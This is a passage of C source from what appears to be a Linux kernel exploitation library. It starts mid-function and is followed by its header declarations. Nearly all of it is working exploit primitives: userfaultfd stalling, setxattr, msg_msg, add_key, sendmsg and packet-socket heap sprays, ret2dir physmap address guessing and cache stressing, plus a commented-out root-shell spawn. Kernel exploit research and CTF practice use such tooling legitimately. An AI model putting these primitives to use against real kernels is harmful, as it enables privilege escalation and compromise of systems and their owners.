uffd_msg msg; /* Data read from userfaultfd */ void *page = NULL; struct uffdio_copy uffdio_copy; void (*handler)(void *); struct pollfd pollfd; struct fault_struct *fault = (struct fault_struct *)arg; u64 addr; int uffd = fault->uffd; pthread_detach(pthread_self()); int found = 0; // polling events on uffd pollfd.fd = uffd; pollfd.events = POLLIN; if(poll(&pollfd, 1, -1) < 0)// wait forever if no new events error_out("polling error"); dprintf("nfault_handler_thread():n"); dprintf("POLLIN = %d; POLLERR = %dn", (pollfd.revents & POLLIN) != 0, (pollfd.revents & POLLERR) != 0); // read the pagefault message if(read(uffd, &msg, sizeof(msg)) <= 0) error_out("fail to read uffd message"); // sanity check the event type if (msg.event != UFFD_EVENT_PAGEFAULT) error_out("unexpected event on userfaultfd handling"); addr = msg.arg.pagefault.address; dprintf(" UFFD_EVENT_PAGEFAULT event: "); dprintf("flags = %llx; ", msg.arg.pagefault.flags); dprintf("address = %llxn", addr); // look for registered page handler u64 start = (u64)fault->addr; if(addr >= start && addr < start + fault->len) { page = addr - start + fault->src_page; found = 1; } if(!found) error_out("Can't find fault handler for addr 0x%llx", msg.arg.pagefault.address); // call the hook fault->hook((void *)addr); // really handle the page fault uffdio_copy.src = (unsigned long) page; uffdio_copy.dst = (unsigned long) addr & ~(0x1000-1); uffdio_copy.len = 0x1000; uffdio_copy.mode = 0; uffdio_copy.copy = 0; if (ioctl(uffd, UFFDIO_COPY, &uffdio_copy) == -1) error_out("ioctl-UFFDIO_COPY"); // after successfully handle the page fault, sleep forever sleep(10000); } void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *)) { int flags = MAP_PRIVATE | MAP_ANONYMOUS; void *addr; struct uffdio_register uffdio_register; pthread_t tid; struct uffdio_api uffdio_api; // initialize userfaultfd api int uffd = syscall(__NR_userfaultfd, O_CLOEXEC | O_NONBLOCK); if(uffd < 0) error_out("fail to call userfaultfd"); uffdio_api.api = UFFD_API; uffdio_api.features = 0; if(ioctl(uffd, UFFDIO_API, &uffdio_api) < 0) error_out("ioctl UFFDIO_API error"); // map the page that needs handling if(wanted) flags |= MAP_FIXED; addr = mmap(wanted, len, PROT_READ | PROT_WRITE | PROT_EXEC, flags, -1, 0); if(addr < 0 || (wanted && addr != wanted)) error_out("mmap failed"); // tell the kernel this address needs page handling uffdio_register.range.start = (unsigned long) addr; uffdio_register.range.len = len; uffdio_register.mode = UFFDIO_REGISTER_MODE_MISSING; if (ioctl(uffd, UFFDIO_REGISTER, &uffdio_register) == -1) error_out("ioctl UFFDIO_REGISTER error"); // initialize the fault_struct struct fault_struct *fault = malloc(sizeof(struct fault_struct)); fault->len = len; fault->src_page = src_page; fault->addr = addr; fault->hook = hook; fault->next = NULL; fault->uffd = uffd; // launch the fault handling thread, it will be always sleeping if the api is not used if(pthread_create(&tid, NULL, fault_handling_thread, fault)) error_out("fail to create page fault handling thread"); return addr; } void init_pagefault(void) { } /* Universal Heap Spray */ void init_univ_spray(void) { // create a dummy file if(access(UNIV_SPRAY_FILE, F_OK) == 0) unlink(UNIV_SPRAY_FILE); int fd = open(UNIV_SPRAY_FILE, O_CREAT); if(fd < 0) error_out("fail to create a file for universal heap spray"); close(fd); init_pagefault(); } static void *univ_spray_func(void *args) { void **args2 = (void **)args; struct spray_struct *spray = (struct spray_struct *)args2[0]; void *addr = args2[1]; pthread_detach(pthread_self()); while(!spray->stage); syscall(__NR_setxattr, UNIV_SPRAY_FILE, "libexp", addr, spray->len, 0); // sleep forever sleep(10000); } struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *)) { void *buffer = mmap(NULL, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); if(buffer < 0) error_out("fail to prepare for universal spray"); // place payload at correct places memcpy(buffer+0x1000-len+1, payload, len-1); *(char *)(buffer) = ((char *)payload)[len-1]; // create struct struct spray_struct *spray = malloc(sizeof(struct spray_struct)); spray->payload = payload; spray->len = len; spray->num = num; spray->stage = 0; // register for pagefault for(int i=0; i<num; i++) { pthread_t tid; // map 2 pages, initialize the first page, remap the second page for page faulting void *addr = mmap(NULL, 0x2000, PROT_READ | PROT_WRITE | PROT_EXEC, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); memcpy(addr, buffer, 0x1000); void *addr2 = reg_pagefault(addr+0x1000, buffer, 0x1000, hook); // start univ_spray_func thread void **args = malloc(sizeof(void *) * 2); if(!args) error_out("malloc error"); args[0] = spray; args[1] = addr + 0x1000 - len + 1; if(pthread_create(&tid, NULL, univ_spray_func, args)) error_out("fail to create page fault handling thread"); } return spray; } void univ_spray(struct spray_struct *spray) { spray->stage = 1; sched_yield(); } void nonsense(void) { char buf[0x400]; puts("start of some fake debug message"); printf("pid: %dn", getpid()); puts("start of nonsense"); memset(buf, 0, sizeof(buf)); for(int i=0; i<10; i++) { hex_print(buf, sizeof(buf)); } } static void stress_add_key(size_t size) { char type[] = "user"; char *desc = alloca(size+1); char payload[1]; key_serial_t keys[0x600]; memset(desc, 0, size+1); payload[0] = 'A'; // do spray for(int i=0; i<sizeof(keys)/sizeof(keys[0]); i++) { key_serial_t key; rand_str(desc, size-1); key = add_key(type, desc, payload, sizeof(payload), KEY_SPEC_THREAD_KEYRING); keys[i] = key; } // cleanup spray keyctl(KEYCTL_REVOKE, KEY_SPEC_THREAD_KEYRING); } static void stress_msg(size_t size) { size_t msg_size = size - 0x30; struct msg_spray_t *spray = msg_spray(NULL, msg_size, 0x600); msg_spray_clean(spray); } static void stress_percpu_cache(int cpuid, size_t cache_size) { set_cpu(cpuid); if(cache_size <= 0x20) stress_add_key(cache_size); else stress_msg(cache_size); } void stress_all_caches() { #ifdef STRESS for(int i=0; i<sizeof(kmalloc_size_array)/sizeof(kmalloc_size_array[0]); i++) { size_t cache_size = kmalloc_size_array[i]; for(int cpuid=0; cpuid<cpu_num; cpuid++) { // printf("%d %lxn", cpuid, cache_size); stress_percpu_cache(cpuid, cache_size); } } #endif } /*reference: https://www.kernel.org/doc/Documentation/vm/pagemap.txt*/ u64 virt_to_physmap(u64 virt_addr, u64 page_offset_base) { u64 pfn = 0; u64 kaddr = 0; u64 value = 0; u64 present = 0; int fd = open("/proc/self/pagemap", O_RDONLY); if(fd < 0) error_out("[virt_to_physmap] fail to open /proc/self/pagemap"); // read the pagemap info about the input virtual address lseek(fd, (virt_addr >> PAGE_SHIFT)*sizeof(u64), SEEK_SET); read(fd, &value, sizeof(u64)); // printf("pagemap: %#llxn", value); // parse the value pfn = value & ((1UL << 55) - 1); present = value & (1UL << 63); if(present && pfn) { // if page exists and page frame exists kaddr = page_offset_base + PAGE_SIZE * (pfn-PFN_MIN); } close(fd); return kaddr; } int block_bit_size() { int ret = 0; u64 val = mem_size; while(val > 0) { ret++; val >>= 1; } return ret+1; } u64 heap_to_physmap(u64 heap_ptr) { int bits = 64-block_bit_size(); u64 mask = (~(1UL << bits)) << (64-bits); // printf("mask: %#llxn", mask); return heap_ptr & mask; } void *ret2dir_setup(void *src_page, u64 heap_ptr) { void *kaddr = NULL; u64 page_offset_base = heap_to_physmap(heap_ptr); printf("offset_base: %#llxn", page_offset_base); u64 upper_limit = mem_size & (~(PAGE_SIZE-1)); // printf("base: %llxn", page_offset_base); // printf("mem_size: %llxn", mem_size); // printf("ret: %llxn", block_bit_size()); // // first, see whether we can directly read pagemap // kaddr = (void *)virt_to_physmap((u64)src_page, page_offset_base); // if(kaddr) return kaddr; // we don't have access to pagemap, try to spray the same page again and again // we use 1/2 of the memory and hope it lands in the middle of it // printf("mem_size: %llxn", mem_size); int i = 0; for(i=0; i<(upper_limit/PAGE_SIZE)/2; i++) { void *addr = mmap(NULL, PAGE_SIZE, PROT_READ | PROT_WRITE, MAP_ANON|MAP_PRIVATE|MAP_POPULATE, -1, 0); // printf("addr: %pn", addr); memcpy(addr, src_page, PAGE_SIZE); // if(i%0x10 == 0) printf("i: %d, %p, %pn", i, addr, virt_to_physmap((u64)addr, 0)); } // now we calculate where our page is, it is // version 1: (UPPER_LIMIT - pages_allocated)/2 kaddr = (void *)(page_offset_base + upper_limit - (i/2)*PAGE_SIZE); // version 2: pages_allocated/2 + 0x3000 // kaddr = (void *)(page_offset_base + (i/2)*PAGE_SIZE) + 0x3000; return kaddr; } struct sendmsg_spray_t *prepare_sendmsg_spray(u32 fork_num, void *payload, size_t len) { if(len > optmem_max) error_out("object too large!"); // record the flag first int *start_flag = umem_alloc(NULL, 0x1000); struct sendmsg_spray_t *spray = malloc(sizeof(struct sendmsg_spray_t)); spray->start_flag = start_flag; spray->ready_proc_num = start_flag+1; // prepare payload data struct cmsghdr *first; first = (struct cmsghdr*)payload; first->cmsg_len = len; first->cmsg_level = 0; // must be different than SOL_SOCKET=1 to "skip" cmsg first->cmsg_type = 0x41414141; // <---- ARBITRARY VALUE // hex_print(first, 0x100); for(int i=0; i<fork_num; i++) { if(!clean_fork()) { int ret; // initialize unix sockets int socks[2]; ret = socketpair(AF_UNIX, SOCK_DGRAM, 0, socks); if(ret) error_out("socketpair"); // set timeout struct timeval tv; memset(&tv, 0, sizeof(tv)); ret = setsockopt(socks[1], SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv)); if(ret) error_out("setsockopt"); // block send socket char buf[0x100]; struct iovec iov = { .iov_base = buf, .iov_len = sizeof(buf), }; struct msghdr mhdr; memset(&mhdr, 0, sizeof(mhdr)); mhdr.msg_iov = &iov; mhdr.msg_iovlen = 1; while(sendmsg(socks[0], &mhdr, MSG_DONTWAIT) > 0); if(errno != EAGAIN) error_out("sendmsg does not block"); __atomic_fetch_add(spray->ready_proc_num, 1, __ATOMIC_SEQ_CST); // puts("block done!"); while(!*spray->start_flag); // prepare spray data iov.iov_len = 0x10; mhdr.msg_control = payload; // use the ancillary data buffer mhdr.msg_controllen = len; if(sendmsg(socks[0], &mhdr, 0) < 0) error_out("sendmsg spray error"); error_out("sendmsg spray does not block"); sleep(10000); } } // wait for all spray processes to get ready while(*spray->ready_proc_num != fork_num); return spray; } void sendmsg_spray(struct sendmsg_spray_t *spray) { *spray->start_flag = 1; sched_yield(); } void sendmsg_spray_transient(u32 num, void *payload, size_t len) { if(len > optmem_max) error_out("object too large!"); // prepare sockets int socks[2]; int ret = socketpair(AF_LOCAL, SOCK_DGRAM, 0, socks); if(ret) error_out("socketpair"); // prepare message struct msghdr mhdr; memset(&mhdr, 0, sizeof(mhdr)); mhdr.msg_iovlen = 0; mhdr.msg_control = payload; mhdr.msg_controllen = len; mhdr.msg_name = "random"; // invalid address mhdr.msg_namelen = 1; // do it! for(int i=0; i<num; i++) sendmsg(socks[0], &mhdr, MSG_DONTWAIT); // cleanup close(socks[0]); close(socks[1]); } static int cpu_idle_cmp(const void *arg1, const void *arg2) { struct cpu_info *info1 = (struct cpu_info *)arg1; struct cpu_info *info2 = (struct cpu_info *)arg2; return info1->nr_running - info2->nr_running; } static void shuffle(void *array, size_t n, size_t size) { char tmp[size]; char *arr = array; size_t stride = size * sizeof(char); srand(__rdtsc()); if(n > 1) { for(size_t i=0; i<n-1; i++) { size_t rnd = (size_t) rand(); size_t j = (i+rnd) % n; memcpy(tmp, arr + j*stride, size); memcpy(arr+j*stride, arr + i*stride, size); memcpy(arr+i*stride, tmp, size); } } } void reload_cpu_info(void) { FILE *f = fopen(SCHED_DEBUG_FILE, "r"); char *line = NULL; size_t n = 0; if(!f) return; // fill up cpu info first int cpuid = 0; while(!feof(f) && cpuid < cpu_num) { char *nr_running_str; int ret; ret = getline(&line, &n, f); if(unlikely(ret < 0)) error_out("reload_cpu_info1"); if(strncmp(line, "cpu#", 4)) continue; ret = getline(&line, &n, f); if(unlikely(ret < 0)) error_out("reload_cpu_info2"); nr_running_str = strstr(line, ": "); if(unlikely(nr_running_str == NULL)) error_out("reload_cpu_info3"); nr_running_str += 2; idle_cpus[cpuid].nr_running = atoi(nr_running_str); idle_cpus[cpuid].cpuid = cpuid; cpuid++; } fclose(f); // shuffle and sort it according to nr_running of the CPUs // so that the sorted array does not favor any CPUs shuffle(idle_cpus, cpu_num, sizeof(*idle_cpus)); qsort(idle_cpus, cpu_num, sizeof(*idle_cpus), cpu_idle_cmp); //// debug print //for(int i=0; i<cpu_num; i++) { // printf("%d: %dn", idle_cpus[i].cpuid, idle_cpus[i].nr_running); //} } void cleanup_msgs(void) { int msgqid; struct msqid_ds ds; struct msginfo msginfo; int maxind = msgctl(0, MSG_INFO, (struct msqid_ds *) &msginfo); if(maxind < 0) error_out("[msg_info]"); // printf("cleanup %d msgsn", maxind); for(int i=0; i<maxind; i++) { int ret; msgqid = msgctl(i, MSG_STAT, &ds); if(msgqid < 0) continue; ret = msgctl(msgqid, IPC_RMID, 0); if(ret < 0) error_out("[msg_rmdi]"); } } u64 _safe_read_u64_from_file(char *fname, u64 def_val) { if(access(fname, R_OK)) return def_val; return _read_u64_from_file(fname); } int pg_vec_spray(void *src_buf, u32 buf_size, u32 num) { if((buf_size & 0xfff) != 0) error_out("[pg_vec_spray] buf_size"); // remember to run everything in sandbox int s = socket(AF_PACKET, SOCK_RAW|SOCK_CLOEXEC, htons(ETH_P_ALL)); if(s < 0) error_out("[pg_vec_spray] socket"); struct tpacket_req req; req.tp_block_size = buf_size; req.tp_block_nr = num;// spray times req.tp_frame_size = buf_size; req.tp_frame_nr = (req.tp_block_size * req.tp_block_nr) / req.tp_frame_size; int ret = setsockopt(s, SOL_PACKET, PACKET_RX_RING, &req, sizeof(req)); if(ret < 0) error_out("[pg_vec_spray] setsockopt"); struct sockaddr_ll sa; memset(&sa, 0, sizeof(sa)); sa.sll_family = PF_PACKET; sa.sll_protocol = htons(ETH_P_ARP); sa.sll_ifindex = if_nametoindex("lo"); sa.sll_hatype = 0; sa.sll_pkttype = 0; sa.sll_halen = 0; memset(&sa, 0, sizeof(sa)); sa.sll_ifindex = if_nametoindex("lo"); sa.sll_halen = ETH_ALEN; void *addr = mmap(NULL, buf_size, PROT_READ|PROT_WRITE, MAP_PRIVATE|MAP_ANON|MAP_POPULATE, -1, 0); memcpy(addr, src_buf, buf_size); for(int i=0; i<num; i++) { ret = sendto(s, addr, buf_size, 0, (struct sockaddr *)&sa, sizeof(sa)); if(ret < 0) error_out("[pg_vec_spray] sendto"); } return s; } void setup_pg_vec() { // bring up lo interface int fd = socket(AF_INET, SOCK_DGRAM, IPPROTO_IP); struct ifreq req; memset(&req, 0, sizeof(req)); strcpy(req.ifr_name, "lo"); req.ifr_flags = IFF_UP|IFF_LOOPBACK|IFF_RUNNING; int ret = ioctl(fd, SIOCSIFFLAGS, &req); if(ret != 0) error_out("[setup_pg_vec] ioctl"); close(fd); } static void __attribute__((constructor)) init(void) { // disable buffering setvbuf(stdin, NULL, _IONBF, 0); setvbuf(stdout, NULL, _IONBF, 0); // very bad random seed lol srand(time(NULL)); // initialize parameters min_cpu_freq = _get_cpu_freq();// KHz min_granularity = _get_min_gran();// NS msgmnb = _read_u64_from_file(MSGMNB_FILE);// NS cpu_num = _get_cpu_num(); mem_size = _get_mem_size(); optmem_max = _safe_read_u64_from_file(OPTMEM_MAX_FILE, 0x5000); idle_cpus = malloc(cpu_num*sizeof(*idle_cpus)); reload_cpu_info(); // calculate the minimal tsc in a minimal time slice: // (min_cpu_freq * 10^3) * (min_granularity / 10^9 ) = min_cpu_freq * min_granularity / (10 ^ 6) min_slice_tsc = (min_cpu_freq / 1000) * (min_granularity / 1000); // initialize cpu_mask CPU_ZERO(&cpu_mask); for(int i=0; i<cpu_num; i++) CPU_SET(i, &cpu_mask); // init urand_fd urand_fd = open("/dev/urandom", 0); if(unlikely(urand_fd < 0)) error_out("fail to open urandom"); #ifdef STRESS sleep(1); #endif } static void __attribute__((destructor)) fini(void) { stress_all_caches(); } //int main() //{ // printf("min_cpu_freq: %lldn", min_cpu_freq); // printf("min_granularity: %lldn", min_granularity); // printf("min_slice_tsc: %lldn", min_slice_tsc); // ts_fence(); // set_cpu(1); // setup_sandbox(); // system("/bin/sh"); // while(1); //}
define u32 unsigned int #define u64 unsigned long long #define i32 int #define i64 long long struct cpu_info { int cpuid; int nr_running; }; struct spray_struct { void *payload; size_t len; u32 num; int stage; }; struct msg_spray_t { struct msg_spray_t *next; int msgqid; void *payload; size_t len; u32 num; }; struct sendmsg_spray_t { int *start_flag; int *ready_proc_num; }; #define likely(x) __builtin_expect(!!(x), 1) #define unlikely(x) __builtin_expect(!!(x), 0) #ifndef pid_t #define pid_t int #define LIBEXP_PID_T #endif void error_out(const char *fmt, ...); void rand_str(char *dest, size_t length); int write_file(const char* fname, const char* fmt, ...); void hex_print(void *addr, size_t len); pid_t clean_fork(void); void *umem_alloc(void *addr, size_t size); void ts_fence(void); void set_cpu(int); void unset_cpu(void); void reload_cpu_info(void); void setup_sandbox(void); void anti_swapper(void (*hook)(void)); void suppress_int(void (*hook)(void)); struct msg_spray_t * msg_spray(void *payload, size_t plen, u32 num); struct msg_spray_t * msg_spray_max(void *payload, size_t plen); void msg_spray_clean(struct msg_spray_t *); void add_key_spray_num(void *payload, size_t size, u32 num); void add_key_desc_spray_num(char *desc, u32 num); void defragment(size_t size, u32 num); void init_pagefault(void); void *reg_pagefault(void *wanted, void *src_page, size_t len, void (*hook)(void *)); void nonsense(void); void init_univ_spray(void); struct spray_struct *prepare_univ_spray(void *payload, size_t len, u32 num, void (*hook)(void *)); void univ_spray(struct spray_struct *spray); void stress_all_caches(); u64 heap_to_physmap(u64 heap_ptr); void *ret2dir_setup(void *, u64); struct sendmsg_spray_t *prepare_sendmsg_spray(u32, void *, size_t); void sendmsg_spray(struct sendmsg_spray_t *); void sendmsg_spray_transient(u32, void *, size_t); void cleanup_msgs(void); int pg_vec_spray(void *src_buf, u32 buf_size, u32 num); void setup_pg_vec(); #ifdef LIBEXP_PID_T #undef pid_t #endif extern u64 cpu_num; extern struct cpu_info *idle_cpus; extern size_t kmalloc_size_array[13];
Demo